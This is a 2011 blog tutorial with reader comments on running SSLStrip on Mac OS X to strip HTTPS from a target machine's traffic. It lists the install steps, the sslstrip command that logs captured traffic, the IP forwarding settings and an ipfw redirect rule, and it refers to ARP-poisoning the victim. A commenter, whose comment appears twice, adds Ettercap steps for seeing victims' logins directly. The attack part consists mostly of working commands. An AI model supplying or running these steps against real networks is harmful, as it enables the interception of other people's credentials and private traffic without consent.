Thursday, January 6, 2011

SSL stripping on OS X with SSLStrip

SSLStrip tool provides a demonstration of the HTTPS stripping attacks - you can download it from here.

Then on OS X 10.6.5 with MacPorts we need to install following dependancies.

1. $ sudo port selfupdate

2. $ sudo port install py25-twisted-web2

3. $ sudo port install py25-socket-ssl

4. $ sudo port install py25-openssl

Now, run the following from the SSLStrip home directory.

$ sudo python sslstrip.py -l 9090 -w captured.log

This will start SSLStrip listening on port 9090 - and will write all captured traffic in to the captured.log

Now starts the interesting part.. We need to make the traffic from our target machine goes through SSLStrip. To do that first we need to make sure the traffic flows through our machine. That we can do by ARP poisoning target machine. My previous blog post explains how to do that. Once that is done - we need to forward all that incoming traffic to port where SSLStrip running.

Enable IP forwarding on MAC.

$ sudo sysctl -w net.inet.ip.forwarding=1
$ sudo sysctl -w net.inet.ip.fw.verbose=1

Now we need to add a rule to IPFW to redirect traffic to the port SSLStrip is running.

$ sudo ipfw add fwd 127.0.0.1,9090 log tcp from not me to any 80

5 comments:

Phenomeno said...

Hi!

The port "py26-socket-ssl" doesn't exists, "only py25-socket-ssl". Did you install it? or which ports should I install to get ssltrip works.

py26-twisted-web2 or py25-twisted-web2

py26-openssl or py25-openssl

Thanks

Prabath said...

Thanks.. done the correction - it's in fact p25...

KB said...

I'm currently trying to get sslstrip going on an iPod Touch or iPhone. Any tips/suggestions? If I figure it out, I'll post back.

-Kevin

Robert said...

Hi, im using this but with Ettercap-ng because i want to see the LOGINS right away instead and i just feel it is much simplier and feels more right.

Here is the commands i use in MAC OS X "lastest"

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.verbose=1
sudo sysctl -w net.inet.ip.scopedroute=0

sudo sslstrip -l 8080
sudo ipfw add fwd 127.0.0.1,8080 log tcp from not me to any 80

sudo ettercap -C <-- Terminal UI Based, Scan for Hosts, Host File: Add target 1 and 2 gateway.. MITM: remote -> Then start sniffing.

And Facile!
You have forgot to tell people to:
sudo sysctl -w net.inet.ip.scopedroute=0 <-- that´s realy important.

Thanks for the great tutorial btw.

Robert said...

Hi, im using this but with Ettercap-ng because i want to see the LOGINS right away instead and i just feel it is much simplier and feels more right.

Here is the commands i use in MAC OS X "lastest"

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.verbose=1
sudo sysctl -w net.inet.ip.scopedroute=0

sudo sslstrip -l 8080
sudo ipfw add fwd 127.0.0.1,8080 log tcp from not me to any 80

sudo ettercap -C <-- Terminal UI Based, Scan for Hosts, Host File: Add target 1 and 2 gateway.. MITM: remote -> Then start sniffing.

And Facile!
You have forgot to tell people to:
sudo sysctl -w net.inet.ip.scopedroute=0 <-- that´s realy important.

Thanks for the great tutorial btw.